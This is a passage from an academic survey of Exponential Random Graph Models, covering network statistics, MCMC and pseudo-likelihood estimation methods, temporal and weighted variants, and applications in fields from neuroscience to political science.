e−αkdk(x) (5) In this equation, x is the matrix we want to compute its corresponding GWDC value and n is the number of nodes in the graph. dk represents the number of nodes with degree k. Also, α is a decaying factor which ensures that the nodes with higher degrees have higher impacts. Geometrically Weighted Stars Counts (GWSC): this measure is an extension of star counts combined with a combination of geometrically degree discounts in computing the statistics, which is expressed as the following expression: GWSC(x)= n−1∑ k=2 (−1)k Sk λk−2 (6) Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269#supp-4 http://dx.doi.org/10.7717/peerj-cs.269#supp-5 http://dx.doi.org/10.7717/peerj-cs.269#supp-6 http://dx.doi.org/10.7717/peerj-cs.269#supp-7 http://dx.doi.org/10.7717/peerj-cs.269 1(d)r =d(d+1)...(d+r−1). In this equation Sk is the number of stars with the k number of edges (k-stars). Also, λ denotes a decaying factor which ensures that the stars with a higher degree have a greater impact. Sum of Ascending Factorial Degrees (SAFD): first presented in Handcock & Jones (2004), it is a variation of Yule distribution using the sum of ascending factorials of degree 1 : SAFD(x)= n∑ i=1 1( yi++c ) r (7) Transitivity by Altering k-Triangles (TAT): this measure is an extension of triangle counts combined with geometrically discounts in the computation of the statistics, which is expressed as the following expression: TAT(x)=3T1− T2 λ − T3 λ2 −...+(−1)n−3 Tn−2 λn−3 (8) In this equation, Tk is the number of k-triangles. λ represents a decaying factor which ensures that the triangles with a higher degree have a more substantial impact. Figure S2 displays a description of k-triangles. Altering Independent Two-Path (AI2P): this measure is an extension of 2-path with a combination of geometrically discounts in the computation of the statistics, which is expressed as the following expression: AI2P(x)=U1− 2 λ U2+ n−2∑ k=3 ( −1 λ )k−1 Uk (9) In this equation, Uk is the number of star k-independent 2-paths. λ represents a decaying factor which ensures that the triangles with higher degrees have higher impacts. In Figure S3, you can see a description of k-independent 2-paths. The authors of Wilson et al. (2017) addressed one of the significant drawbacks of ERGMs. As can be seen in Tables S2 and S3, the weights of the graphs are missing. In other words, they are only applicable to unweighted graphs, and if we want to use them in the context of the weighted graphs, their weights should be omitted. However, much useful information underlies the weight of the graphs and for most of the domains it is crucial to consider them to accurately model the graph. Following this idea previously discussed in Desmarais & Cranmer (2012) and Krivitsky (2012), they continued to design more flexible estimation methods for the so-called Generalized ERGMs (GERGM). Their method can handle a wide range of graphs’ statistics with continuous-valued edges. The endogenous statistics need to be selected before implementing the model. Therefore, there must be several assumptions about choosing a particular statistic. Although the process of finding the best statistics for the model is highly empirical, considerations when making a hypothesis about the network’s configurations is important. The choice of a specific statistic is highly dependent on the assumptions we have about network phenomena. Simple structures like the number of edges and nodes take control of the size and sparsity of the graph. In a friendship network, triangles can indicate the inclination of mutual friends becoming friends with each other. In a citation network stars refers to Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 7/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269#supp-2 http://dx.doi.org/10.7717/peerj-cs.269#supp-3 http://dx.doi.org/10.7717/peerj-cs.269#supp-5 http://dx.doi.org/10.7717/peerj-cs.269#supp-6 http://dx.doi.org/10.7717/peerj-cs.269 a large number of central nodes (Van der Pol, 2018). The dyadic dependence assumption between nodes should also be considered while choosing the proper statistics for the model. Dyadic dependence is the dependent processes among two dyads. A dyad in this context refers to a pair of nodes and their relation. The dyadic dependence among processes could arise a number of problems like model degeneracy, for more information see Handcock et al. (2008). New specifications like geometrically weighted degree counts and Altering k-Triangles have been introduced to alleviate model degeneracies resulted from dyadic dependence. This is achieved by increasing the stability of the model with weighting the low density and reducing the weight for higher degrees to avoid the degeneracy (Snijders et al., 2006; Van der Pol, 2018). METHODS FOR ESTIMATION One crucial step in the ERGMs models is to fit the coefficient of the model to the observed data after designing the model with desired configurations. Multiple methods exist for this purpose. Nevertheless, the overall approach in all of them is developing a likelihood function based on the ERGM formulation and then solving it with some of the mathematical methods that exist for Maximum Likelihood Estimation (MLE). Note that all of the MLE solution methods should be specialized for the ERGM modeling. After introducing the general form of the mentioned likelihood function, we are going to present a brief description of some of the methods for solving it already presented in the literature. A form of the likelihood function We aim to find the best values of theθ vector in Eq. (3) which maximize the probability over the observed data. In a more formal expression, we want to solve the following equation: θML :=argmaxθ∈Rk P(X|θ) (10) where, P is the same probability function as the Eq. (3) and, Rk represents all possible real values over a k-dimentional space. Note that the θ is a vector of coefficients rather than a single value; thus, its space value should be a vector space. Different methods exist for solving such equations. Here, we are going to name a few of them which are mostly used in the ERGM related works. Also, we intend to present a number of state-of-the-art methods that have been presented after 2016. PRELIMINARIES Sampling methods There are two important applications of sampling methods in the ERGMs parameter estimation model: • In all methods, there is a need to simulate graphs from the fitted model or simulate some graphs to gain more insight into the distribution of the graphs and their configurations (Lusher, Koskinen & Robins, 2012). This distribution is also used to test whether the distribution of the fitted model is close to the observed data or not. • Predicting the prior distribution of the graphs for Bayesian learning models Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 8/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 Make a change to the graph from previous state Start with an initial graph (usually empty graph) Generate probability results based on the graphs statistics Choose between the current graph or the graph from the previous step Done Not enough samples Enough samples Figure 1 Finite state automata of a MCMC procedure. Full-size DOI: 10.7717/peerjcs.269/fig-1 So, there is a need for sampling methods to draw a sample from the given graph distribution. In this section, we present some of the sampling methods that have been used extensively in the literature. Monte Carlo Markov Chain sampling method which is abbreviated to MCMC (Metropolis et al., 1953) is a well-known sampling method which has been used in many works. Here, we only discuss it in the context of graph generation. In this method, we start with an initial graph which can also be an empty graph. Then, in each iteration, a new graph is generated by making a small change to the graph from the last step. The form of this ‘‘change’’ is different from work to work. The most straightforward change is adding or removing a tie. The procedure is as follows: two nodes are chosen randomly. After which the state of their connection is altered (if they are already connected, they become disconnected while if they are not connected, they become connected.). In the next step, the probability of the generated graph is computed according to Eq. (3). This probability is compared to that of the graph generated in the previous step. Then, we accept or reject the new graph based on the comparison of these two probabilities. If the new graph is more probable, it is more likely to substitute the old graph in the next iteration. The probability of whether the new graph is chosen for the next iteration or the graph from the last step is re-chosen depends on which one of them has a higher probability score in Eq. (3). Note that only having a higher probability score is not a guarantee that the graph gets chosen. It only increases the chance of selection. All these outlined the scheme of all MCMC methods. However, the details including how many of ties are altered in each iteration or the probabilistic selection between the old graph and the new one are different in literature. We intend to present a quick introduction to the Metropolis-Hasting sampling methods which is mostly used in ERGM related literature. Figure 1 displays the overall procedure of an MCMC method. Metropolis-Hasting Metropolis et al. (1953) is the most widely used MCMC derivation in ERGM studies. Metropolis Hasting in the context of graph generation is as follows. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 9/30 https://peerj.com https://doi.org/10.7717/peerjcs.269/fig-1 http://dx.doi.org/10.7717/peerj-cs.269 Simulate the distribution of the graphs based on that parameter Start with an initial parameter vector Find the difference between the observed data and the simulated distribution Choose between the current graph or the graph from the previous step Done Figure 2 Procedure of fitting ERGMs variables. Full-size DOI: 10.7717/peerjcs.269/fig-2 Initially, as we explained in the general MCMC scheme, we start with an empty or random graph. Our goal is to generate N samples from the distribution of graphs, implying that we want to generate a sequence of x1,x2,...,xN graphs. We choose two random nodes at each step and change the tie situation between them. The probability of the newly generated graph and the graph from the last step is then computed using the following formula: min { 1, P(X =xnew|θ) P(X =xN−1|θ) } . (11) This formula computes the probability of whether to accept the new move or substitute the last step graph as the new one. Classic methods So far, we have reviewed the necessary preliminaries. Now, we can review the most widely used methods in the literature for estimating the value for statistical parameters (θ in Eq. (4)) best representing the observed data. In other words, our aim is to solve Eq. (10). Most of the methods use the following steps: initially, they start with an initial value for the parameter vector. Then, the distribution of the graphs is generated by one of the sampling methods. Next, the difference between the distribution and the observed data is computed (Eθ(C(X))−C(Xobserved). If the difference is satisfactory, the learning process is halted and the current vector of the parameter is considered as the final answer which best fits the observed data; Otherwise, based on the learning method the algorithm moves to the subsequent values of θ and goes back to step 2. Figure 2 demonstrates the finite automata of this method. The ultimate goal of all learning methods is to find a vector of θ values in Eq. (3) that can also generate graphs which are similar to the observed graphs. To this end, different learning methods exist and this section describes the most important of them namely importance sampling and stochastic approximation. We used the description presented in Lusher, Koskinen & Robins (2012). Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 10/30 https://peerj.com https://doi.org/10.7717/peerjcs.269/fig-2 http://dx.doi.org/10.7717/peerj-cs.269 Importance sampling The goal as we said is to minimize the expected value of θ which minimizes the expected value between observed statistics and the ones generated by the ERGM model. The aim is to use Maximum Likelihood that we discussed before to find the best value of vector θ which maximize the right hand side of Eq. (10). One possible approach is to search over all possible θ values in the search space and try them one by one. But since the search space is very large and θ values are continuous this approach is not practical. Instead of such brute force algorithm, one of the methods for ERGMs parameter estimation is the one inspired by the general framework ML estimation method for dependent data introduced by (Geyer & Thompson, 1992). The main idea is to instead of generating the whole possible graphs of a particular θ vector, we can draw a large sample of the graphs and consider it as a representation of the whole possible graphs at each iteration. This sample is generated from the current value of the θ vector using the Eq. (3) and is used in the formula to compute Eθ(C(X)) and then compute how much the value Eθ(C(X))−C(Xobserved) is close to zero. At each iteration an average over the generated graphs statistics is computed to measure Eθ(C(X)) and decide whether to continue the estimation or not based on how much the Eθ(C(X))−C(Xobserved) is close to zero. Other than the mentioned halting situation we need an algorithm to move from each θ vector to a new one (if the halting is not satisfied). A Newton-Raphson formula is used to move from one statistic to another. For more detail on the mathematical details of the sampling and the used Newton-Raphson based method see (Lusher, Koskinen & Robins, 2012). Stochastic approximation The This model presented in Snijders (2002) can handle both bimodal and multimodal and enhance the speed of convergence. They also used the Newton-Raphson method for the learning step of the algorithm. As mentioned in Lusher, Koskinen & Robins (2012), they used a three-step method. At phase one, a limited number of iterations is performed to determine initial values of the algorithm. In the second step, the Newton-Raphson algorithm is employed to optimize the answer. Finally, the convergence criteria are checked. Newly presented methods for ERGM estimation In Byshkin et al. (2016), the authors improved the MCMC sampling part of the ERGM estimation by adding an auxiliary parameter to the model. In their method, which they called Improved Fixed Density (IFD) MCMC sampler, they tried to decrease the state space of the network to reduce the time complexity of the algorithm. This new auxiliary variable which was based on the number of ties helped the model to converge faster without the need of making the MCMC overall model more complicated. In some works like (Stivala et al., 2016), snowball sampling (Coleman, 1958; Goodman, 1961) was used to overcome the computational complexity of the MCMC method over large network datasets. As mentioned earlier, the Bayesian estimation of the parameters requires prior knowledge about the network posterior distribution. However, this posterior probability distribution Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 11/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 is not always easily available. To overcome this issue, (Bouranis, Friel & Maire, 2017) introduced a pseudo-likelihood estimation approach by replacing the posterior distribution with a more achievable pseudo-distribution. Although this method resulted in faster computation of the likelihood function, as mentioned in the (Schmid & Desmarais, 2017), its results are not still as precise as they should. To handle this problem, the same mentioned article introduced another pseudo-likelihood estimator based on the bootstrapping parameters which culminated in more accurate convergence. In a recent work (Bouranis, Friel & Maire, 2018), the authors proposed yet another heuristic model based on pseudo-likelihood estimation. They did so by performing three adjustments to the pseudo-likelihood function: (1) mode corrections to overcome the bias of the pseudo-likelihood function; (2) curvature adjustment, which is a modification in the selection of the transformation matrix and the corresponding Hessian matrix; and (3) magnitude adjustment, which is a linear transformation to scale the curvature-adjusted pseudo likelihood to the right values. Despite all the progress in the ERGMs parameter estimation and modeling, it is still a hard task in large graphs. Thiemichen & Kauermann (2017) addressed two of the main challenges of ERGMs, including the instability of the model especially in the models with more straightforward statistics like triangles and the time-consuming nature of the ERGM parameter estimation procedure due to large number of numerical simulations. For solving the first problem, they proposed a technique to produce smooth stable statistics. Further, to overcome the second issue, they employed a novel subsampling model which instead of fitting the model to the whole network it only fit the model to subgraphs from the network and then aggregated these sample estimates. The two mentioned ideas yielded a significant improvement for modeling large graphs. ERGMs variations Apart from the basic definition of ERGMs there are also some other variations of ERGMs. Each year a number of new extensions of the original ERGM definition are introduced. In this chapter we introduce three of the most widely used ERGMs variations. Evolution of networks in dynamic environment like social networks has attracted scientist to make an extension of the ERGMs called Temporal ERGMs a.k.a. TERGMs which is capable of capturing the information underlying dynamics of such networks (Hanneke et al., 2010). A Markov assumption between snapshots of the network at each timestep is taken. Then the model is created based upon the relation between each two consecutive snapshots St and St−1. P(X =St|St−1,θ)= 1 N(θ,St−1) exp { θ T ,ψ(St,St−1) } . (12) As it can be seen in Eq. (12) most parts of the formula for TERGM is similar to normal ERGM. However, the time snapshots are now considered and each new time snapshot St is dependent to its previous one St−1. Also, the normal count of the networks statistics has been substituted with temporal potential count ψ over two consecutive snapshots. For more information see Hanneke et al. (2010) and for the information about the btergm which is a library for temporal ERGMs see Leifeld, Cranmer & Desmarais (2017). Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 12/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 Most of the real-world network are associated with a value on their edges which are referred to as weighted graphs in graph theory. A plethora of researches have been done to consider these types of networks into the ERGM general schema. GERGM (Desmarais & Cranmer, 2012) and the model proposed by Krivitsky (2012) are the two most well- known models which have incorporated the networks’ edges’ weights into the model. The normalizing factor in Eq. (3) which is the denominator of Eq. (4) is not assured to be convergent when the network statistics (C(x) in the Eq. (4)) are infinite set like continuous valued edges. GERGM is a model aimed to overcome this issue by using a probability model for such continuous values. They build a transformed version of the original ERGM formula that no longer suffers from the mentioned problem. The Krivitsky (2012) have also extended the previous binary version of ERGM which only models edges existence rather than their value into a model which is capable of capturing the information of weighted graphs. However, his method is restricted to natural valued weights on the edges. In network science there is a special kind of networks called multiplex or multilayer networks. These are networks which their nodes are connected in the context of more than one attribute. For example, in a social relation network, actors might have several relations between them like friendship network or co-working network. Each of these relations can be abstracted as a layer in a network model. Also, in some situations, there is a hierarchical structure in the data like modeling the relations inside a university. There are schools, which are divided into groups and lecturers and students. An extension of ERGM which is applicable to model such scenarios in multilevel networks is proposed for these networks (Wang et al., 2013). They considered relation between the nodes in each level and also the inter-level relations into the model. For example, consider a two layer network with layers A, B and an imaginary layer between them called x which is for the purpose of modelling inter-level relations between A and B. Then the Eq. (1) is re-written as: P(A=a,X =x,B=b|θ)= 1 N exp{θTa Ca(a)+θ T b Cb(b)+θ T x Cx(x)+ θ T a,xCa,x(a,x)+θ T b,xCb,x(b,x)+θ T a,b,xCa,b,x(a,b,x)} (13) Which the θTa ,θ T b ,θ T x ,θ T b,x,θ T a,x,θ T a,b,x are the parameters for statistics which are extracted from layers a,b and the inter-level relations a,x and b,x and the inter-level relation of layers a,b. The same is true for the count functions of the statistics. θ is the set of all types of statistics. APPLICATIONS OF ERGMS As mentioned previously, ERGMs are a useful tool for scientists from various disciplines. Networks are everywhere, and anywhere that they exist they can be analyzed using ERGMs and other statistical models. Note that here we have mostly reviewed the works since 2016. Medical imaging In order to take care of the limitations of the descriptive analysis of brain neural networks, the author of Sinke et al. (2016) used ERGMs to be able to model the observed network using the joint contribution of network structure. They also compared the changes in brain Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 13/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 networks statistics across different ages. This study was conducted to examine the effects of aging during lifetime in the brain global and local structures. Graphs where extracted from brain images obtained from diffusion tensor imaging (DTI). Four network statistics were used to model these networks: • The number of edges • The geometrically weighted edgewise shared partner (Hunter, 2007) • The geometrically weighted non-edgewise shared partner (Hunter, 2007) • The hemispheric node match: a binary indicator which shows whether two nodes are in the same hemisphere of the brain. The Bayesian learning schema from Caimo & Friel (2011) was used to fit the model. In a recent work, (Dellitalia et al., 2018) employed ERGMs to study the structure of neural networks of the brain. They aimed to increase the chance of unconscious and injured patients to recover by analyzing brain functional data. In their work, they overcame four shortcomings of previous methods by incorporating ERGMs into their study. For example, one of them was the ability to assess the dynamics of the network over time.They used the Separable Temporal ERGMs (TERGM) (Krivitsky & Handcock, 2014) for their modeling. One of the aspects of their work that successfully handled with ERGMs was that the network structures they chose should have not been necessarily independent. This restriction was one of the main drawbacks of previous methods. Functional Magnetic Resonance Imaging or fMRI is a method for observing brain activities and their changes over time. There are components in the fMRI images which can be explained using network analysis methods. Nodal signals, network architecture, and network function are the three essential network properties in building fMRI-based networks (Solo et al., 2018). ERGMs are one the main important network analysis methods which have been used to explain such networks. The authors of a review paper (Solo et al., 2018) introduced the most critical efforts with the aim to explain these brain networks. Note that there are plenty of works which used ERGM as their method (Simpson, Hayasaka & Laurienti, 2011; Simpson, Moussa & Laurienti, 2012). Healthcare applications Having a healthy life is one the central concerns of human life. If we look at this issue from a macro perspective, we can see that many health-related problems can be alleviated by analyzing their corresponding inter-related actors. For example, in epidemiology, there is a direct connection between the patient relationships and the extent that the disease can spread. In most cases, these relations between the actors will result in the formation of a network. This network can be analyzed using ERGMs to answer different questions underpinning its formation and dynamics. This kind of analysis is something that has already been done extensively by researchers in the healthcare community. Analyzing inter-hospital patient referral network is a significant problem which (Caimo, Pallotti & Lomi, 2017) has recently investigated using ERMGs. They used a combination of the edges and nodes of the network and utilized the Bayesian approach introduced in Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 Caimo & Friel (2011) to fit their model. This task was done using BERGM (Caimo & Friel, 2014) R language package for their implementation. Another work (Baggio, Luisier & Vladescu, 2017) shed light on the relationship between social isolation and mental health. The connection between these two subjects was investigated by analyzing the network of Romanian adolescents using ERGM modeling. They concluded that there is a strong link between the two mentioned concepts. Application of statistical network in epidemiology and disease spreading is another interesting topic which has attracted from the attention of the biological science community. (Silk et al., 2017) provided an important opportunity to advance the understanding of the pattern and evolution of infections in static and dynamic environments. They also used ERGMs for their models. In their ERGM model, they employed a fair number of both structural and node-based attributes. The ERGM (Hunter et al., 2008) R language package was used for the tests. Social ties can reveal a wide range of aspects of human life. The networks formed by such ties and edges among individuals can transfer life habits and behaviors in a society. For example, in many kinds of literature, the relationship between social tie and analysis of obesity has been investigated. Zhang et al. (2018b) thoroughly studied the articles related to applications of social network analysis to obesity. In another work related to eating disorders, (Becker et al., 2018) have presented some findings using ERGM network analysis about the relationship between the eating disorders and human relationships. They conducted their study on members of a sorority at Southeastern University. Economics and management Marketing organizations that are responsible for promoting tourist destination have also been analyzed using ERGMs. (Williams & Hristov, 2018) intended to study the networks underpinning Destination Marketing Organizations (DMOs). They developed four models with the most complex one consisting of the following statistics: • Number of edges • The geometrically weighted edgewise shared partner (Hunter, 2007) • Properties of membership and industry background. Global migration and different attributes of immigrants can be considered as a network. There are many theories on how these networks shape and evolve and how they depend on immigrants and country backgrounds. ethnicity, wealth, religion). (Windzio, 2018) applied ERGM in order to examine theories and hypotheses about creation and evolution of these networks. He used both the graph structure and node attributes in a large number of statistics. Global tourism and its corresponding network, Global Tourism Network (GTN), is yet another field of study, given the tremendous financial importance of tourism market. As mentioned in Lozano & Gutiérrez (2018), it is essential to gain insight into the connections between its components. In the same article, an ERGM approach was used to find the critical local substructures of the GTNs. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 15/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 Handling the budget and resources during crises is always a challenging task for humanitarian organizations. There is a need for a tradeoff between the use of asset supplies for the current crises and the usual ongoing projects. This problem has been formulated in the form of asset supply networks. Stauffer et al. (2018) used ERGMs as an empirical model to understand the asset flows during a crisis. The applications of ERGMs have even been extended to the analysis of online drug distribution networks. In a recent work, (Duxbury & Haynie, 2018) conducted the mentioned research on a dataset of an online drugstore on the dark web. They studied such networks concerning their topological dynamics, suppliers, and customer demand as well as the resistance of such networks to disruptions. Does economic partnership between professionals will result in further trust and solidarity? This is the central question of Bianchi, Casnici & Squazzoni (2018). They developed an ERGM multiplex network model collaboration network and a number of other attributes and then analyzed it using multivariate ERGMs to examine social support and trust for each of the network statistics. Political science A large number of articles in the political science community have used ERGMs for their modeling. This enthusiasm toward ERGMs among political science scholars well suggests that it is among the most famous mathematical modeling in the field. Here we introduce a handful of these articles. Sustainable development policy is a major concern both for the government and the private sector. It is only achievable by interaction among individuals. In particular, the role of the connection between funding sectors and those in need of money is important for carrying out their projects. This is the central problem of Gallemore & Jespersen (2016). The dataset consisted of 91 donor organizations. The role of ERGM in this work was modeling the donor agent relationship networks. Another major issue that has been addressed through ERGMs is collaborative governance between different sectors and individuals of multiple organizations. In Ulibarri & Scott (2016), the authors used ERGM to test their hypothesis about what should be observed in low-collaboration vs. high-collaboration networks. Four simple ERGMs’ configurations were used, including: • The number of networks ties • The number of nonzero ties • The number of reciprocity relations in the network • The number of transitivity relations in the network. In a more recent work, (Scott & Thomas, 2017) addressed the same problem. However, they used different datasets and network statistics. Hamilton & Lubell (2018) also took the same ERGM modeling approach in discussing the collaborative governance, in the special domain of climate change adoption. In an exciting work, Li et al. (2017) investigated the effectiveness of military alliances in making peace between states. They used temporal random graph models for longitudinal Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 16/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 network data of alliance. They employed two different sets of network statistics and developed two models upon them. Communications via internet social networks have helped the human to take a huge step further. People from multiple backgrounds and societies are engaged in conversations that have never been possible before the widespread popularity of online social networks. In the case of political conversations in social networks, there is always the dilemma whether this freedom has resulted in more communications between people with different ideologies or adversely it will cause people with same viewpoints tend to dominate most of the conversation thereby self-reinforcing the same way of thinking. (Song, Cho & Benefield, 2018) addressed this issue by studying the network of message selection of users during a presidential election and then analyzed the mentioned network by a Temporal ERGM (TERMG) to answer the questions above. The world trade network has also been investigated via TERGMs. Pan (2018) studied these networks to answer the underlying questions about them and their effects on related subjects. Even further, some works such as Chen (2019) took the use of ERGM networks in modeling political networks a step further by incorporating multilayer networks properties into their models. He proved with experimental results that this multilayer approach toward ERGMs could better fit the model to the observed data. The analysis and challenges of power transition in a personalized authoritarian system is a problem that has been discussed in Osei (2018) using ERGM modeling. In addition to qualitative methods, the author employed ERGM as a quantitative method to answer questions about the regime survival of the regime under the mentioned situations. The network in this context consisted of elite interactions network in authoritarian countries. They found that many of the important people in the past ruler administration still play a crucial role in the current government. Environmental treaties among governments play a vital rule in solving environmental issues. However, coming to an agreement in such commitments is not straightforward. The aim of Campbell et al. (2019) is to study the model of ratification in such treaties among different parties or states. The main contribution of this research is to find out how the influence network between countries can affect the interdependency of countries decisions on environmental politics. To this end, they have used Bipartite Longitudinal Influence Network (BLIN) model to extract two latent influence network using which show negative and positive influence among different countries. Later these two networks have been analyzed using ERGMs to find the effective contextual and structural network statistics on the shaping of influence (negative or positive) networks (Marrsetal, 2018). Network of international arm trade is yet another subject that has been studied using ERGM simulations (Thurner et al., 2019). The structure of weapon exchanges network between countries and alias is very complicated. A plethora of effective factors are effective in the formation of the network. Economic enhancement of the seller and the desire to strengthen they allay in different regions of the words are two important considerations from the dealers. Their datasets are extracted from available data of arm deals after world war II. Temporal ERGMs were used for during the analysis. They have used a number of statistics based on their hypothesis about importer and exporter effects, size of the Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 17/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 countries’ domestic economic markets, national material capabilities, conflict involvement joint membership in defense agreement, geographic distance between two countries. Most of the statistics used in this work were exogenous statistics. Missing data and link prediction Link prediction is the problem of finding missing links in a network. As we explained, ERGM deals with estimating graph distribution and generating a new graph based on them. Graph generation part is the exact process of finding missing links. However, in link prediction, we do not want to estimate the whole graph distribution, and we desire to find the probability of link formation between two nodes based on the current structure of the graph. Smith (2012) used ERGMs to create a global view of networks with missing data based on sampled data. In their approach, they took sampled ego networks and tried to estimate features of the whole network. The interesting fact about this work was that not both the structure of the network and its size were unknown. A three-step algorithm was used, and in the last step, the aim was to predict the global structure of the network from the fitted model. Two real-world network data were used in the tests including addition of health network and sociology co-authorship network. Koskinen et al. (2013) used the same approach of leveraging ERGM for data augmentation in graphs with missing tie variable. In an empirical test, they were able to estimate the missing tie variable of a network with 74% missing tie with fair precision. As the article name suggests, they used a Bayesian estimation method for fitting the parameters of their model. Zhang, Zhai & Wu (2013) applied ERGMs for predicting links in microblogs. They used five kinds of graph statistics with four of them (2–5) introduced in Hunter (2007): • Number of edges • Gwidegree (Geometrically weighted indegree): the weighting indegree of the network. • Gwidegree (Geometrically weighted outdegree): the weighting outdegree of the network. • Gwodegree (Geometrically weighted dyadwise shared partner): the number of shared nodes of all node pairs in the network. • Gwesp (Geometrically weighted edgewise shared partner): similar with Gwdsp, it is the number of shared nodes for linked node pairs in the network. The link prediction based on the ERGM method introduced in this article is an iterative approach. At each step, they compute the conditional probability of adding an edge between two arbitrary nodes having the observed part of the network. This process is performed several times through an MCMC simulation, and at last the average of all these steps is computed: P ( Xij =1|X c =xc ) = 1 N exp ( θ T C ( xij =1,x c)) (14) In Eq. (14), Xij is the probability of presence of an edge between nodes i and j. Xc is also the state of all other edges in the time predicting Xij. Five datasets have been used: Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 18/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 • Sina Microblog dataset community of ‘‘Beijing badminton community.’’ • Sina Microblog dataset community of ‘‘Beijing bicycle community.’’ • Sina Microblog dataset community of ‘‘Data mining community.’’ • Scientist co-authorship dataset GR (General Category). The authors of Krause & Caimo (2019) have presented a new estimation algorithm for Bayesian Exponential Random Multi-graphs model which is an imputation model applicable to such multi-layer networks. This work is an extension of the Koskinen, Robins & Pattison (2010) to multi-layer networks. An interested reader can refer to a recent survey on different imputation method on network missing data (Krause et al., 2018). One of the advantages of this methods is that it is solely about missing data in the context of networks. Different missing data treatment methods have been tested on different missing data in a complete benchmarking framework. Scientific collaboration Finding the best colleagues or best-related research papers and topics is always a significant issue for anyone in the scientific community. Co-author and citation networks analyses are two important topics that have been extensively studied in research related to analysis of networks addressing these issues. The researchers in Zhang et al. (2018a) addressed the effect of three major network properties in scientific collaboration networks including Homophily, Transitivity, and Preferential attachment. Performing an ERGM study on these networks, they argued that incorporating the mentioned properties we can provide more insight into how collaborations form. The data for this study were collected using the metadata of papers’ citations from the Web of Science from 1956 to 2014. As we approach more complex scientific phenomena, we more feel the need for collaboration between different scientific communities. Fagan et al. (2018) also studied a co-authorship network to evaluate the changes in inter-disciplinary scientific articles. More precisely, they applied a special form of ERGMs called the Separable Temporal ERGMs (STERGM) Krivitsky & Handcock (2014) to evaluate the co-authorship network over time and make prediction ties in the network. They employed some structural and nodal attributes. Structural attributes refer to a number of edges, degree, and triadic closure, while some nodal attributes capture whether two individuals have the same professor rank, gender, and college. ERGMs are widely used for citation networks analysis. An & Ding (2018) performed the same study in the special case of publications on causal inference. They argued that some technical and social processes are underpinning citation networks. Their ultimate goal was to explain the essential factors in forming a citation network and predicting the citation patterns. An in-depth study of polarization among researchers of the field of social science was performed in a recent work (Leifeld, 2018). He used both qualitative and quantitative methods to address the most compelling reasons and strategies causing the polarization. Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 19/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 He applied ERGM as his qualitative method over two co-authorship networks in the field of social science in two separate countries. Other than the studies on co-authorships and citation networks there are other aspects of scientific collaboration that have been widely studied. One of such studies is the study on how the recruitment of new members of scientific collaborators in scientific organizations takes place. In a study (Leifeld & Fisher, 2017) the dynamics underlying the membership procedure of new scientist in international scientific assessments has been evaluated. The authors have used a dataset extracted from an international well-known research program on world’s ecosystem called Millennium Ecosystem Assessment (MA). Their method is based on analyzing the pattern of the network formation by ERGM using a number of exogenous and endogenous network’s statistics. The analysis approved the authors hypothesis which suggests that factors like having the same nationality to the previous researcher in the research group or being in the same institution with them have a high impact on the recruitment of new researchers. This could result in lack of diversity of opinions in the final outcomes of the assessments conducted by the research group. Wireless networks modelling Random Geometric Graphs also known as RGGs are defined as the group of graphs which are obtained by placing a number of nodes randomly in a geometrical space and draw vertices between those nodes which their distance is less than a threshold d in a given norm (Penrose et al., 2003). One issue in the wireless sensor networks is that there is not a fixed placement for the nodes in most of times. The nodes are randomly distributed and therefore the shape of connecting graph tend to be very volatile (Raghavendra, Sivalingam & Znati, 2006). Studying these graphs formation and the statistical dynamic behind their formation has been extensively investigated in the literature related to RGGs (Iyer & Manjunath, 2006). For example, exponential RGGs which are the RGGs that the distribution of their nodes is also exponential (Gupta, Iyer & Manjunath, 2008). These graphs have been used for modeling wireless sensor networks Shang (2009) abd Kenniche & Ravelomananana (2010). In the Shang (2009) the wireless sensors are assumed to be on a line and to evolve over time with respect to a dynamic RGG process. The effect of statistical properties for a particular time snapshot has also been considered in this paper. Such analysis with using one-dimensional RGG has also been done in the past in Karamchandani et al. (2006). Vehicular Ad Hoc Network are yet another use case for RGGs (Zhang et al., 2014). Due to the movement of the vehicles and the rapid changes in the graph they have many similarities to previous applications of RGGs. Other applications The applications of ERGMs are so extensive that some works cannot be organized in a particular category. In this section, we introduce some of them. The concept of social networks is not limited only to human relationships. There are some complex interactions in animal behaviors which can be modeled as graphs. ERGMs are also a useful tool for analyzing these kinds of networks. In a recent work, (Silk & Fisher, 2017) reviewed the use of ERGMs in such studies. Also, more specifically, other recent Ghafouri and Khasteh (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.269 20/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.269 works have leveraged ERGMs capabilities in their specific context. Hellmann & Hamilton (2018) is a work in which the authors investigated the effect of neighbors’ mediation in cooperative fish breeding by analyzing their interactions with an ERGM model. In another work (Silk et al., 2018), the same approach was used to investigate sex-related disease spreading through animal contact networks in three sorts 